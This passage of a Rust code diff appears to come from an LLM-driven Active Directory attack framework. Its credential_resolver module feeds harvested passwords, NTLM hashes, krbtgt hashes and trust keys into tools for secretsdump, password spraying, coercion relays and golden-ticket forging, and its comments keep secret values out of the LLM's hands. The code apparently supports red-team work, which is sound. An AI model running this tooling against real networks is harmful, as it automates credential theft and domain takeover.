excluded = args + .get("excluded_users") + .and_then(|v| v.as_str()) + .unwrap(); + let mut parts: Vec<&str> = excluded.split(',').collect(); + parts.sort(); + assert_eq!(parts, vec!["administrator", "testuser1", "testuser2"]); +} + +#[tokio::test] +async fn inject_excluded_users_no_domain_is_noop() { + let state = SharedState::new("op-1".into()); + state + .write() + .await + .quarantine_user("testuser1", "contoso.local"); + let mut args = serde_json::json!({"target": "1.2.3.4"}); + inject_excluded_users(&Some(state), "password_spray", &mut args).await; + assert!(args.get("excluded_users").is_none()); +} diff --git a/ares-cli/src/worker/credential_resolver.rs b/ares-cli/src/worker/credential_resolver.rs new file mode 100644 index 00000000..86a7d3c5 --- /dev/null +++ b/ares-cli/src/worker/credential_resolver.rs @@ -0,0 +1,1581 @@ +//! State-based credential resolver for tool dispatch. +//! +//! The LLM names principals (`username`, `domain`) and targets — never secret +//! material. This module resolves the actual `password`, `hash`, `aes_key`, +//! `ticket_path`, `trust_key`, and SID values from operation state immediately +//! before `ares_tools::dispatch`. +//! +//! If the LLM (or anything upstream) supplies a credential-shaped argument, this +//! resolver replaces it with the state-resolved value. The LLM never wins. +//! +//! When state has no value for a credential the tool needs, the resolver leaves +//! the field absent and the tool's executor surfaces a normal "missing +//! parameter" error to the LLM. That signal tells the orchestrator to harvest +//! credentials before retrying. +//! +//! Lookup keys per field: +//! +//! | Field | Source | +//! | --------------------- | ---------------------------------------------- | +//! | `password` | `Credential.password` by `(username, domain)` | +//! | `hash` | `Hash.hash_value` by `(username, domain)` | +//! | `nt_hash` | NT half of `Hash.hash_value` | +//! | `aes_key` | `Hash.aes_key` by `(username, domain)` | +//! | `ticket_path` | most-recent `*.ccache` matching principal | +//! | `krbtgt_hash` | `Hash` for `(krbtgt, domain)` | +//! | `child_krbtgt_hash` | `Hash` for `(krbtgt, child_domain)` | +//! | `trust_key` | `Hash` for `(target_netbios + '$', source)` | +//! | `trust_aes_key` | `Hash.aes_key` for trust account | +//! | `domain_sid` | `domain_sids` HASH by `domain` | +//! | `source_sid` | `domain_sids` HASH by `source_domain` | +//! | `target_sid` | `domain_sids` HASH by `target_domain`/trusted | + +use std::path::PathBuf; + +use anyhow::Result; +use redis::aio::ConnectionManager; +use serde_json::{Map, Value}; +use tracing::{debug, info, warn}; + +use ares_core::models::{Credential, Hash}; +use ares_core::state::RedisStateReader; + +/// Argument keys that contain secret material and must come from state, never +/// from the LLM. +pub const CREDENTIAL_KEYS: &[&str] = &[ + "password", + "hash", + "nt_hash", + "ntlm_hash", + "aes_key", + "aes256_key", + "ticket_path", + "krbtgt_hash", + "child_krbtgt_hash", + "parent_krbtgt_hash", + "trust_key", + "trust_aes_key", + "trust_hash", + "admin_hash", + "coerce_password", + "coerce_hash", + "domain_sid", + "source_sid", + "target_sid", + "extra_sid", + "kerberos_keys", +]; + +/// Resolve credential arguments for a tool call from operation state. +/// +/// Mutates `arguments` in place. Reads `username`, `domain`, `source_domain`, +/// `target_domain`, `trusted_domain`, `child_domain` to identify the principal. 
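+///
+/// Call sketch (illustrative names; assumes a live Redis connection for an
+/// operation with harvested state):
+///
+/// ```ignore
+/// let mut args = serde_json::json!({"username": "admin", "domain": "contoso.local"});
+/// resolve_credentials(&mut conn, Some("op-1"), "secretsdump", &mut args).await?;
+/// // args now carries password / hash / aes_key values pulled from state.
+/// ```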
+/// Looks up credentials from the operation's Redis state and sets credential
+/// keys on the arguments object.
+///
+/// If `operation_id` is `None`, this is a no-op: the tool runs with whatever
+/// arguments were provided. This handles direct CLI invokes and tests.
+pub async fn resolve_credentials(
+    conn: &mut ConnectionManager,
+    operation_id: Option<&str>,
+    tool_name: &str,
+    arguments: &mut Value,
+) -> Result<()> {
+    let Some(op_id) = operation_id else {
+        debug!(
+            tool = %tool_name,
+            "credential_resolver: no operation_id, skipping resolution"
+        );
+        return Ok(());
+    };
+
+    let Some(args_obj) = arguments.as_object_mut() else {
+        return Ok(());
+    };
+
+    // Strip any LLM-supplied credential placeholders before lookup. Even if
+    // state has nothing, we never want a `[HASH]` or `<password>` literal to
+    // reach the dispatch layer.
+    strip_placeholder_credentials(args_obj);
+
+    let reader = RedisStateReader::new(op_id.to_string());
+
+    // Bulk-load state once per call. These are HASHes/LISTs cached in Redis,
+    // so the cost is small relative to the subsequent tool execution.
+    let credentials = reader.get_credentials(conn).await.unwrap_or_default();
+    let hashes = reader.get_hashes(conn).await.unwrap_or_default();
+    let domain_sids = reader.get_domain_sids(conn).await.unwrap_or_default();
+
+    let primary_username = string_field(args_obj, "username");
+    // `bind_domain` is the auth realm for cross-forest queries (e.g.
+    // ldap_search against fabrikam.local using a contoso.local principal).
+    // `domain` is the *target* of the query in those tools, not the
+    // credential's domain — looking up `(user, domain=target)` misses the
+    // stored principal. Prefer `bind_domain` when present so cross-forest
+    // LDAP/RPC enumerations can resolve their auth cred.
+    let mut primary_domain = string_field(args_obj, "bind_domain")
+        .or_else(|| string_field(args_obj, "domain"))
+        .or_else(|| string_field(args_obj, "source_domain"))
+        .or_else(|| string_field(args_obj, "child_domain"));
+
+    // Fallback: when the LLM passes `domain=""`, infer the domain from the
+    // target host. Without this, every downstream resolution (password,
+    // hash, ticket) fails because primary_domain is None and the
+    // `(Some, Some)` guard below never fires. Tools then bail with
+    // "credentials must be present in operation state for the (user, domain)
+    // pair" even though the credential exists under the host's domain.
+    //
+    // Resolution order — first match wins:
+    // 1. If `target`/`target_ip`/`dc_ip` is an IP that matches a DC, use
+    //    that DC's domain.
+    // 2. If `target_hostname`/`hostname`/`target` carries an FQDN suffix
+    //    (e.g. `dc01.contoso.local`), use the suffix.
+    if primary_domain.is_none() {
+        primary_domain = infer_domain_from_target(args_obj, conn, &reader).await;
+        if let Some(ref d) = primary_domain {
+            // Inject the resolved domain back into args so downstream tools
+            // (which read `domain` directly) get a non-empty realm too.
+            if !args_obj
+                .get("domain")
+                .and_then(|v| v.as_str())
+                .map(|s| !s.trim().is_empty())
+                .unwrap_or(false)
+            {
+                args_obj.insert("domain".to_string(), Value::String(d.clone()));
+            }
+            debug!(
+                tool = %tool_name,
+                domain = %d,
+                "credential_resolver: inferred missing domain from target host"
+            );
+        }
+    }
+
+    info!(
+        tool = %tool_name,
+        user = primary_username.as_deref().unwrap_or("(none)"),
+        domain = primary_domain.as_deref().unwrap_or("(none)"),
+        cred_count = credentials.len(),
+        hash_count = hashes.len(),
+        "credential_resolver: resolving"
+    );
+
+    // Standard principal credentials (password, hash, aes_key)
+    if let (Some(user), Some(domain)) = (primary_username.as_deref(), primary_domain.as_deref()) {
+        let pw_before = args_obj.contains_key("password");
+        let hash_before = args_obj.contains_key("hash");
+        let realm_strict = requires_exact_realm(tool_name);
+        resolve_principal_credentials(args_obj, &credentials, &hashes, user, domain, realm_strict);
+        let pw_injected = !pw_before && args_obj.contains_key("password");
+        let hash_injected = !hash_before && args_obj.contains_key("hash");
+        if pw_injected || hash_injected {
+            info!(
+                tool = %tool_name,
+                user = %user,
+                domain = %domain,
+                injected_password = pw_injected,
+                injected_hash = hash_injected,
+                "credential_resolver: injected from state"
+            );
+        } else if !pw_before && !hash_before {
+            warn!(
+                tool = %tool_name,
+                user = %user,
+                domain = %domain,
+                cred_count = credentials.len(),
+                hash_count = hashes.len(),
+                "credential_resolver: no credential matched principal in state"
+            );
+        }
+    }
+
+    // Auxiliary principal: `coerce_user` / `coerce_domain` for relay_and_coerce.
+    // The LLM names the coercion principal; the resolver injects
+    // `coerce_password` or `coerce_hash` from state.
+    resolve_coerce_principal(args_obj, &credentials, &hashes);
+
+    // Kerberos ticket path — pick most recent matching ccache when the schema
+    // expects one but the args don't have it.
+    if expects_ticket(tool_name, args_obj) {
+        if let (Some(user), Some(domain)) = (primary_username.as_deref(), primary_domain.as_deref())
+        {
+            if let Some(path) = find_ccache(user, domain) {
+                args_obj.insert("ticket_path".to_string(), Value::String(path));
+            }
+        }
+    }
+
+    // krbtgt hash — for golden ticket forging.
+    resolve_krbtgt_hashes(args_obj, &hashes);
+
+    // Cross-forest Kerberos ticket — inject ticket_path for LDAP-bind tools
+    // when the target server is in a foreign forest. `primary_domain` prefers
+    // `bind_domain` (the auth realm) for cred resolution, but the inter-realm
+    // ticket must be looked up by the *target* realm (the server's realm).
+    // For ldap_acl_enumeration / ldap_search against a foreign DC, the LLM
+    // passes `domain=<target realm>` and `bind_domain=<auth realm>` — without
+    // this distinction we look up the ticket under the auth realm and miss
+    // the forged ccache, leaving the tool to attempt cross-realm NTLM bind
+    // (which the foreign DC rejects with 0x52e).
+    if requires_exact_realm(tool_name) && !args_obj.contains_key("ticket_path") {
+        let target_realm = string_field(args_obj, "target_domain")
+            .or_else(|| string_field(args_obj, "domain"))
+            .or_else(|| primary_domain.clone());
+        if let Some(ref realm) = target_realm {
+            resolve_cross_forest_ticket(args_obj, &reader, conn, tool_name, realm, &hashes).await;
+        }
+    }
+
+    // Trust keys — Hash entries for `<NETBIOS>$` machine accounts.
+    resolve_trust_key(args_obj, &hashes, &reader, conn).await;
+
+    // Domain SIDs — direct lookup against the domain_sids HASH.
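+    // e.g. with domain_sids {"contoso.local": "S-1-5-21-..."} the resolver can
+    // fill domain_sid / source_sid / target_sid keyed off the *_domain args.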
+    resolve_domain_sids(args_obj, &domain_sids);
+
+    Ok(())
+}
+
+/// Remove any credential-shaped argument whose value is empty, null, or a
+/// placeholder literal (e.g. `[HASH]`, `<password>`, `N/A`, `unknown`).
+fn strip_placeholder_credentials(args: &mut Map<String, Value>) {
+    let mut to_remove = Vec::new();
+    for key in CREDENTIAL_KEYS {
+        if let Some(v) = args.get(*key) {
+            if is_placeholder_value(v) {
+                to_remove.push((*key).to_string());
+            }
+        }
+    }
+    for key in to_remove {
+        warn!(
+            arg = %key,
+            "credential_resolver: stripping LLM-supplied placeholder credential"
+        );
+        args.remove(&key);
+    }
+}
+
+fn is_placeholder_value(v: &Value) -> bool {
+    match v {
+        Value::Null => true,
+        Value::String(s) => is_placeholder_str(s),
+        _ => false,
+    }
+}
+
+fn is_placeholder_str(s: &str) -> bool {
+    let t = s.trim();
+    if t.is_empty() {
+        return true;
+    }
+    // Bracketed placeholders: [TGT], [PWD], <password>, <hash>
+    if (t.starts_with('[') && t.ends_with(']')) || (t.starts_with('<') && t.ends_with('>')) {
+        return true;
+    }
+    let lower = t.to_ascii_lowercase();
+    // Bare placeholder words the LLM has been observed to invent.
+    matches!(
+        lower.as_str(),
+        "n/a"
+            | "na"
+            | "null"
+            | "none"
+            | "nil"
+            | "unknown"
+            | "tbd"
+            | "todo"
+            | "password"
+            | "hash"
+            | "ntlm"
+            | "nthash"
+            | "tgt"
+            | "ticket"
+            | "ccache"
+            | "aes"
+            | "aes_key"
+            | "trust_key"
+            | "domain_sid"
+            | "krbtgt_hash"
+            | "placeholder"
+    )
+}
+
+/// Resolve `password`, `hash`, `nt_hash`, `aes_key` for the primary principal.
+///
+/// `realm_strict` controls cross-realm fallback. When true, only credentials
+/// matching the requested `domain` are returned; the `any_user` fallback is
+/// suppressed. Set this for tools that perform a direct bind against the
+/// target realm's DC (LDAP/RPC), where a foreign-realm cred just produces
+/// invalidCredentials (52e/775). Leave false for tools that traverse trusts
+/// via Kerberos referral or NTLM pass-through (smbclient, secretsdump),
+/// where the user-matching cred from a different realm still authenticates.
+fn resolve_principal_credentials(
+    args: &mut Map<String, Value>,
+    credentials: &[Credential],
+    hashes: &[Hash],
+    username: &str,
+    domain: &str,
+    realm_strict: bool,
+) {
+    if !args.contains_key("password") {
+        if let Some(cred) = find_credential(credentials, username, domain, realm_strict) {
+            if !cred.password.is_empty() {
+                args.insert("password".to_string(), Value::String(cred.password.clone()));
+                debug!(
+                    user = %username,
+                    domain = %domain,
+                    "credential_resolver: injected password from state"
+                );
+            }
+        }
+    }
+
+    let hash_match = find_hash(hashes, username, domain, realm_strict);
+    if let Some(h) = hash_match {
+        if !args.contains_key("hash") && !h.hash_value.is_empty() {
+            args.insert("hash".to_string(), Value::String(h.hash_value.clone()));
+            debug!(
+                user = %username,
+                domain = %domain,
+                "credential_resolver: injected hash from state"
+            );
+        }
+        if !args.contains_key("nt_hash") && !h.hash_value.is_empty() {
+            let nt = nt_hash_only(&h.hash_value).to_string();
+            if !nt.is_empty() {
+                args.insert("nt_hash".to_string(), Value::String(nt));
+            }
+        }
+        if !args.contains_key("aes_key") {
+            if let Some(aes) = h.aes_key.as_deref().filter(|s| !s.is_empty()) {
+                args.insert("aes_key".to_string(), Value::String(aes.to_string()));
+            }
+        }
+    }
+}
+
+/// Inject `coerce_password` / `coerce_hash` for `relay_and_coerce` based on
+/// `(coerce_user, coerce_domain)` in the args. Mirrors
+/// `resolve_principal_credentials` but writes to the `coerce_*` keys.
+///
+/// No-op when `coerce_user` is absent or empty. When the user has only a
+/// password in state, sets `coerce_password`; when only a hash, sets
+/// `coerce_hash`. If both exist, sets only `coerce_hash` (the auth path
+/// downstream prefers PTH for relay-fallback DFSCoerce/Coercer auth).
+fn resolve_coerce_principal(
+    args: &mut Map<String, Value>,
+    credentials: &[Credential],
+    hashes: &[Hash],
+) {
+    let Some(user) = string_field(args, "coerce_user") else {
+        return;
+    };
+    if user.is_empty() {
+        return;
+    }
+    let domain = string_field(args, "coerce_domain").unwrap_or_default();
+
+    if !args.contains_key("coerce_hash") && !args.contains_key("coerce_password") {
+        if let Some(h) = find_hash(hashes, &user, &domain, false) {
+            if !h.hash_value.is_empty() {
+                args.insert(
+                    "coerce_hash".to_string(),
+                    Value::String(h.hash_value.clone()),
+                );
+                debug!(
+                    user = %user,
+                    domain = %domain,
+                    "credential_resolver: injected coerce_hash from state"
+                );
+                return;
+            }
+        }
+        if let Some(cred) = find_credential(credentials, &user, &domain, false) {
+            if !cred.password.is_empty() {
+                args.insert(
+                    "coerce_password".to_string(),
+                    Value::String(cred.password.clone()),
+                );
+                debug!(
+                    user = %user,
+                    domain = %domain,
+                    "credential_resolver: injected coerce_password from state"
+                );
+            }
+        }
+    }
+}
+
+/// Look up the krbtgt hash for the relevant domain when the tool needs it.
+///
+/// Tools like `generate_golden_ticket` consume `krbtgt_hash`. The LLM names
+/// the domain to forge in; we look up the most recent `Hash` for `krbtgt` in
+/// that domain.
+fn resolve_krbtgt_hashes(args: &mut Map<String, Value>, hashes: &[Hash]) {
+    // krbtgt is per-domain — never cross-realm fall back. A different
+    // domain's krbtgt forges a useless ticket.
+    if !args.contains_key("krbtgt_hash") {
+        if let Some(domain) = string_field(args, "domain") {
+            if let Some(h) = find_hash(hashes, "krbtgt", &domain, true) {
+                if !h.hash_value.is_empty() {
+                    args.insert(
+                        "krbtgt_hash".to_string(),
+                        Value::String(h.hash_value.clone()),
+                    );
+                }
+            }
+        }
+    }
+
+    if !args.contains_key("child_krbtgt_hash") {
+        if let Some(child) = string_field(args, "child_domain") {
+            if let Some(h) = find_hash(hashes, "krbtgt", &child, true) {
+                if !h.hash_value.is_empty() {
+                    args.insert(
+                        "child_krbtgt_hash".to_string(),
+                        Value::String(h.hash_value.clone()),
+                    );
+                }
+            }
+        }
+    }
+}
+
+/// Resolve the inter-realm trust key for cross-domain ticket forging.
+///
+/// Trust keys are stored as `Hash` entries with username `<NETBIOS>$` in the
+/// source domain (where the trust was extracted). We try both the
+/// trusted-domain name and its NetBIOS flat name from the trust info.
+async fn resolve_trust_key(
+    args: &mut Map<String, Value>,
+    hashes: &[Hash],
+    reader: &RedisStateReader,
+    conn: &mut ConnectionManager,
+) {
+    if args.contains_key("trust_key") {
+        return;
+    }
+    let Some(source_domain) = string_field(args, "source_domain")
+        .or_else(|| string_field(args, "domain"))
+        .or_else(|| string_field(args, "child_domain"))
+    else {
+        return;
+    };
+    let Some(target_domain) = string_field(args, "target_domain")
+        .or_else(|| string_field(args, "trusted_domain"))
+        .or_else(|| string_field(args, "parent_domain"))
+    else {
+        return;
+    };
+
+    // Possible trust account usernames the worker has stored.
+    let mut candidates: Vec<String> = vec![
+        format!("{}$", target_domain.split('.').next().unwrap_or("")).to_uppercase(),
+        format!("{target_domain}$"),
+    ];
+    // Look up flat name from trust info.
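+    // (e.g. for target_domain "fabrikam.local" the static candidates are
+    // "FABRIKAM$" and "fabrikam.local$"; the stored flat name is appended next.)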
+    if let Ok(trusted) = reader.get_trusted_domains(conn).await {
+        if let Some(trust) = trusted.get(&target_domain.to_lowercase()) {
+            if !trust.flat_name.is_empty() {
+                candidates.push(format!("{}$", trust.flat_name));
+                candidates.push(format!("{}$", trust.flat_name.to_uppercase()));
+            }
+        }
+    }
+    candidates.retain(|c| !c.is_empty() && !c.starts_with('$'));
+
+    for cand in &candidates {
+        // Trust keys are per-(source, target$) — never cross-realm fall back.
+        if let Some(h) = find_hash(hashes, cand, &source_domain, true) {
+            if !h.hash_value.is_empty() {
+                args.insert("trust_key".to_string(), Value::String(h.hash_value.clone()));
+                if !args.contains_key("trust_aes_key") {
+                    if let Some(aes) = h.aes_key.as_deref().filter(|s| !s.is_empty()) {
+                        args.insert("trust_aes_key".to_string(), Value::String(aes.to_string()));
+                    }
+                }
+                debug!(
+                    source = %source_domain,
+                    target = %target_domain,
+                    account = %cand,
+                    "credential_resolver: injected trust_key from state"
+                );
+                return;
+            }
+        }
+    }
+}
+
+/// Resolve `domain_sid`, `source_sid`, `target_sid` from the `domain_sids` HASH.
+fn resolve_domain_sids(
+    args: &mut Map<String, Value>,
+    domain_sids: &std::collections::HashMap<String, String>,
+) {
+    let lookups: &[(&str, &[&str])] = &[
+        ("domain_sid", &["domain"]),
+        ("source_sid", &["source_domain", "domain", "child_domain"]),
+        (
+            "target_sid",
+            &["target_domain", "trusted_domain", "parent_domain"],
+        ),
+    ];
+
+    for (sid_key, domain_keys) in lookups {
+        if args.contains_key(*sid_key) {
+            continue;
+        }
+        for domain_key in *domain_keys {
+            if let Some(domain) = string_field(args, domain_key) {
+                if let Some(sid) = lookup_domain_sid(domain_sids, &domain) {
+                    args.insert((*sid_key).to_string(), Value::String(sid));
+                    break;
+                }
+            }
+        }
+    }
+}
+
+fn lookup_domain_sid(
+    domain_sids: &std::collections::HashMap<String, String>,
+    domain: &str,
+) -> Option<String> {
+    let lower = domain.to_lowercase();
+    if let Some(s) = domain_sids.get(&lower) {
+        return Some(s.clone());
+    }
+    domain_sids.get(domain).cloned()
+}
+
+// ─── Helpers ────────────────────────────────────────────────────────────────
+
+/// Best-effort domain resolution from a tool call's target arguments.
+///
+/// Walks the standard target argument keys in priority order:
+/// - IP-shaped values are matched against the DC map (`domain → dc_ip`),
+///   returning the DC's domain.
+/// - FQDN-shaped values return their domain suffix (`dc01.contoso.local`
+///   → `contoso.local`).
+/// - Bare hostnames / unmatched IPs are skipped — a wrong-domain guess
+///   here would just produce an authentication failure.
+async fn infer_domain_from_target(
+    args: &Map<String, Value>,
+    conn: &mut ConnectionManager,
+    reader: &RedisStateReader,
+) -> Option<String> {
+    const TARGET_KEYS: &[&str] = &[
+        "target",
+        "target_ip",
+        "dc_ip",
+        "target_host",
+        "target_hostname",
+        "hostname",
+        "host",
+    ];
+
+    let dc_map = reader.get_dc_map(conn).await.unwrap_or_default();
+
+    for key in TARGET_KEYS {
+        let Some(value) = string_field(args, key) else {
+            continue;
+        };
+        // FQDN suffix: anything with a dot that isn't an IP literal.
+        if !looks_like_ip(&value) {
+            if let Some((_, suffix)) = value.split_once('.') {
+                let s = suffix.trim().to_lowercase();
+                if !s.is_empty() && s.contains('.') {
+                    return Some(s);
+                }
+            }
+            continue;
+        }
+        // IP literal: look up against the DC map.
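+        // e.g. a dc_map entry ("contoso.local" → "192.168.58.10") resolves a
+        // target of "192.168.58.10" to "contoso.local" (illustrative values).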
+        for (domain, ip) in &dc_map {
+            if ip.trim() == value {
+                let d = domain.trim().to_lowercase();
+                if !d.is_empty() {
+                    return Some(d);
+                }
+            }
+        }
+    }
+    None
+}
+
+fn looks_like_ip(s: &str) -> bool {
+    let trimmed = s.trim();
+    let octets: Vec<&str> = trimmed.split('.').collect();
+    octets.len() == 4 && octets.iter().all(|o| o.parse::<u8>().is_ok())
+}
+
+fn string_field(args: &Map<String, Value>, key: &str) -> Option<String> {
+    args.get(key)
+        .and_then(|v| v.as_str())
+        .map(|s| s.trim().to_string())
+        .filter(|s| !s.is_empty())
+}
+
+fn find_credential<'a>(
+    credentials: &'a [Credential],
+    username: &str,
+    domain: &str,
+    realm_strict: bool,
+) -> Option<&'a Credential> {
+    let user_l = username.to_lowercase();
+    let domain_l = domain.to_lowercase();
+    let domain_empty = domain_l.is_empty();
+
+    let mut exact: Option<&Credential> = None;
+    let mut any_user: Option<&Credential> = None;
+    for cred in credentials {
+        if cred.username.to_lowercase() != user_l {
+            continue;
+        }
+        if cred.password.is_empty() || is_placeholder_str(&cred.password) {
+            continue;
+        }
+        let domain_match = domain_empty || cred.domain.to_lowercase() == domain_l;
+        if domain_match {
+            match exact {
+                None => exact = Some(cred),
+                Some(prev) if cred.attack_step >= prev.attack_step => exact = Some(cred),
+                _ => {}
+            }
+        }
+        match any_user {
+            None => any_user = Some(cred),
+            Some(prev) if cred.attack_step >= prev.attack_step => any_user = Some(cred),
+            _ => {}
+        }
+    }
+    // Realm-strict callers (LDAP/RPC direct bind) MUST get an exact-realm
+    // match or nothing. A foreign-realm cred just produces 52e/775 at bind
+    // time and burns the dispatch.
+    if realm_strict {
+        return exact;
+    }
+    // Username-only fallback: when the LLM passes the *target* domain (the
+    // tool's destination) instead of the credential's home realm, exact match
+    // fails. Cross-realm tools (smbclient against a foreign DC, secretsdump
+    // with cross-forest principal) still need that user's password — Kerberos
+    // referrals or NTLM pass-through handle the actual auth. Returning a
+    // user-matching cred from a different realm beats refusing the dispatch
+    // and forcing the agent to re-request the same lookup.
+    //
+    // Skip the fallback for common per-domain accounts: each AD domain has
+    // its own `Administrator`/`Guest`/`krbtgt` SAM account with a different
+    // password and SID. Substituting one domain's `Administrator` for
+    // another's just produces STATUS_LOGON_FAILURE and burns a tool call.
+    if exact.is_some() || !is_common_per_domain_account(&user_l) {
+        exact.or(any_user)
+    } else {
+        exact
+    }
+}
+
+fn is_common_per_domain_account(user_l: &str) -> bool {
+    matches!(user_l, "administrator" | "guest" | "krbtgt")
+}
+
+/// Tools that authenticate via direct bind to the target realm's DC (LDAP or
+/// LDAP-backed RPC). For these, a cross-realm cred from another forest just
+/// produces STATUS_LOGON_FAILURE / invalidCredentials. The orchestrator gets
+/// faster forward progress by returning no credential — the dispatch fails
+/// cleanly, the failure is reported back, and the orchestrator can re-derive
+/// the right principal — than by injecting a wrong-realm cred that wastes
+/// the LLM's tool budget on a guaranteed-failed bind.
+///
+/// Tools NOT in this list (smbclient, secretsdump, nxc) traverse trusts via
+/// Kerberos referral or NTLM pass-through and benefit from the cross-realm
+/// `any_user` fallback.
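+///
+/// e.g. `requires_exact_realm("ldap_search")` is true (direct bind against the
+/// target realm's DC), while `requires_exact_realm("smbclient")` is false.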
+pub(crate) fn requires_exact_realm(tool_name: &str) -> bool {
+    matches!(
+        tool_name,
+        "bloodyad_set_password"
+            | "bloodyad_add_group_member"
+            | "bloodyad_add_genericall"
+            | "dacl_edit"
+            | "pywhisker"
+            | "ldap_search"
+            | "ldap_search_descriptions"
+            | "ldap_acl_enumeration"
+            | "targeted_kerberoast"
+            | "kerberoast"
+            | "nopac"
+            | "certifried"
+            | "enumerate_domain_trusts"
+    )
+}
+
+fn find_hash<'a>(
+    hashes: &'a [Hash],
+    username: &str,
+    domain: &str,
+    realm_strict: bool,
+) -> Option<&'a Hash> {
+    let user_l = username.to_lowercase();
+    let domain_l = domain.to_lowercase();
+    let domain_empty = domain_l.is_empty();
+
+    let mut exact: Option<&Hash> = None;
+    let mut exact_aes: Option<&Hash> = None;
+    let mut any_user: Option<&Hash> = None;
+    let mut any_user_aes: Option<&Hash> = None;
+    for h in hashes {
+        if h.username.to_lowercase() != user_l {
+            continue;
+        }
+        if h.hash_value.is_empty() {
+            continue;
+        }
+        if !is_authenticating_hash_type(&h.hash_type) {
+            continue;
+        }
+        let h_domain_l = h.domain.to_lowercase();
+        let domain_match = domain_empty || h.domain.is_empty() || h_domain_l == domain_l;
+        let has_aes = h.aes_key.as_deref().is_some_and(|s| !s.is_empty());
+        if domain_match {
+            match exact {
+                None => exact = Some(h),
+                Some(prev) if h.attack_step >= prev.attack_step => exact = Some(h),
+                _ => {}
+            }
+            if has_aes {
+                match exact_aes {
+                    None => exact_aes = Some(h),
+                    Some(prev) if h.attack_step >= prev.attack_step => exact_aes = Some(h),
+                    _ => {}
+                }
+            }
+        }
+        match any_user {
+            None => any_user = Some(h),
+            Some(prev) if h.attack_step >= prev.attack_step => any_user = Some(h),
+            _ => {}
+        }
+        if has_aes {
+            match any_user_aes {
+                None => any_user_aes = Some(h),
+                Some(prev) if h.attack_step >= prev.attack_step => any_user_aes = Some(h),
+                _ => {}
+            }
+        }
+    }
+    let exact_pick = exact_aes.or(exact);
+    if realm_strict {
+        return exact_pick;
+    }
+    if exact_pick.is_some() || !is_common_per_domain_account(&user_l) {
+        exact_pick.or(any_user_aes).or(any_user)
+    } else {
+        exact_pick
+    }
+}
+
+/// True when this hash type can be used directly for authentication (NTLM,
+/// AES key). False for offline-cracking artifacts like kerberoast/asreproast
+/// TGS ciphertext.
+fn is_authenticating_hash_type(hash_type: &str) -> bool {
+    let t = hash_type.to_ascii_lowercase();
+    !matches!(
+        t.as_str(),
+        "kerberoast" | "asreproast" | "asrep" | "tgs" | "krb5tgs" | "krb5asrep"
+    )
+}
+
+/// Strip an `LM:NT` colon-form hash to just the NT half.
+fn nt_hash_only(hash: &str) -> &str {
+    hash.rsplit(':').next().unwrap_or(hash).trim()
+}
+
+/// True when the tool expects a Kerberos ticket and the args don't have one.
+fn expects_ticket(tool_name: &str, args: &Map<String, Value>) -> bool {
+    if args.contains_key("ticket_path") {
+        return false;
+    }
+    tool_name.ends_with("_kerberos")
+        || matches!(
+            tool_name,
+            "secretsdump_kerberos" | "psexec_kerberos" | "wmiexec_kerberos" | "smbexec_kerberos"
+        )
+}
+
+/// Find the most-recent `*.ccache` file in the worker's working directory that
+/// matches the principal.
+///
+/// Convention: tools that forge tickets save them as `<user>.ccache` in CWD.
+/// We accept either an exact match or any ccache when the principal matches by
+/// stem.
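+///
+/// e.g. `administrator.ccache` matches exactly, and
+/// `administrator@fabrikam.local.ccache` matches by stem prefix; when several
+/// match, the newest mtime wins.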
+fn find_ccache(username: &str, _domain: &str) -> Option<String> {
+    let cwd = std::env::current_dir().ok()?;
+    let user_lower = username.to_lowercase();
+
+    let mut best: Option<(std::time::SystemTime, PathBuf)> = None;
+    let entries = std::fs::read_dir(&cwd).ok()?;
+    for entry in entries.flatten() {
+        let path = entry.path();
+        let Some(name) = path.file_name().and_then(|s| s.to_str()) else {
+            continue;
+        };
+        if !name.ends_with(".ccache") {
+            continue;
+        }
+        let stem = name.trim_end_matches(".ccache").to_lowercase();
+        if stem != user_lower && !stem.starts_with(&user_lower) {
+            continue;
+        }
+        let mtime = entry
+            .metadata()
+            .and_then(|m| m.modified())
+            .unwrap_or(std::time::SystemTime::UNIX_EPOCH);
+        match &best {
+            None => best = Some((mtime, path)),
+            Some((t, _)) if mtime >= *t => best = Some((mtime, path)),
+            _ => {}
+        }
+    }
+    best.map(|(_, p)| p.to_string_lossy().to_string())
+}
+
+/// Inject `ticket_path` for a cross-forest LDAP-bind tool using a forged
+/// inter-realm ccache stored in Redis.
+///
+/// Called only when `requires_exact_realm(tool_name)` is true and the
+/// primary domain has no matching NTLM credential in state (i.e. the target
+/// is a foreign forest where NTLM bind would return 0x52e). Looks up the
+/// `kerberos_tickets` HASH for a `(*, target_domain, Administrator)` entry
+/// and injects the ccache path into `args["ticket_path"]`.
+///
+/// If the target domain doesn't have a kerberos ticket in Redis this is a
+/// no-op — the tool will fail with a missing-credential error, which is the
+/// correct signal to the orchestrator.
+async fn resolve_cross_forest_ticket(
+    args: &mut Map<String, Value>,
+    reader: &RedisStateReader,
+    conn: &mut ConnectionManager,
+    tool_name: &str,
+    target_domain: &str,
+    hashes: &[Hash],
+) {
+    // Only fire when the tool has no usable NTLM credential for the target
+    // domain (i.e. the realm_strict check already blocked cross-realm fallback).
+    // If there's already an exact-domain hash for a non-common account, NTLM
+    // bind will work and we don't need Kerberos.
+    let user_l = string_field(args, "username")
+        .map(|u| u.to_lowercase())
+        .unwrap_or_default();
+    let domain_l = target_domain.to_lowercase();
+    let has_ntlm = hashes.iter().any(|h| {
+        h.domain.to_lowercase() == domain_l
+            && (user_l.is_empty() || h.username.to_lowercase() == user_l)
+            && !h.hash_value.is_empty()
+            && is_authenticating_hash_type(&h.hash_type)
+    });
+    if has_ntlm {
+        // NTLM bind is available — no need to inject Kerberos ticket.
+        return;
+    }
+
+    // Look up kerberos_tickets HASH in Redis.
+    let tickets = reader.get_kerberos_tickets(conn).await.unwrap_or_default();
+
+    // Find the most recent ticket for the target domain (any source, Administrator).
+    // Administrator is the only username we forge in the suppression path.
+    let ticket = tickets.iter().find(|t| {
+        t.target_domain.to_lowercase() == domain_l
+            && t.username.eq_ignore_ascii_case("Administrator")
+            && !t.ticket_path.is_empty()
+    });
+
+    let Some(ticket) = ticket else {
+        debug!(
+            tool = %tool_name,
+            target_domain = %target_domain,
+            "credential_resolver: no inter-realm Kerberos ticket found for cross-forest tool"
+        );
+        return;
+    };
+
+    // Sanity-check the ccache exists on disk (best-effort — workers may not
+    // share the same host in some deployments).
+    if !std::path::Path::new(&ticket.ticket_path).exists() {
+        warn!(
+            tool = %tool_name,
+            target_domain = %target_domain,
+            ticket_path = %ticket.ticket_path,
+            "credential_resolver: inter-realm ccache not found on disk — skipping injection"
+        );
+        return;
+    }
+
+    info!(
+        tool = %tool_name,
+        target_domain = %target_domain,
+        ticket_path = %ticket.ticket_path,
